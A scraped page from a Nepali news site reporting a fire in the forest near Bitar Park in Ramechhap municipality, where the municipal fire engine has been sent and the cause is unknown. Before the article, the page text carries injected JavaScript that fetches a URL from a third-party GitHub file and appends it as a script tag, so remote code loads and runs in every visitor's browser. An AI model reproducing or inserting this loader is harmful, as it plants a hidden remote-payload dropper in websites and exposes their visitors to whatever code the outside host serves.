;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); बिटार पार्क नजिकैको जंगलमा भिषण आगोलागी – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • बिटार पार्क नजिकैको जंगलमा भिषण आगोलागी
जुनेली बिशेष

बिटार पार्क नजिकैको जंगलमा भिषण आगोलागी

चैत २५,

रामेछाप । रामेछापको रामेछाप नगरपालिका वडा नं ८ बिटारको जंगलमा भिषण आगोलागी भएको छ । आगो अहिले लागि रहेको छ ।

आगो के कारणले लागेको भन्ने खुल्न सकेको छैन। आगो नियन्त्रणमा लिनको लागि नगरपालिकाको दमकल त्यस तर्फ पठाइएको छ । आगो पूरै जंगलमा लागेको छ ।

रामेछाप सहयोगी मन (रासम)ले निर्माण गरेको बिटार पार्टक नजिकैको जंगलमा भिषण आगोलागेको हो । जिल्लामा प्रिमनसुन सुरु भए यता पटक पटक आगोलागी भैरहेको छ ।

फेसबुक प्रतिक्रियाहरु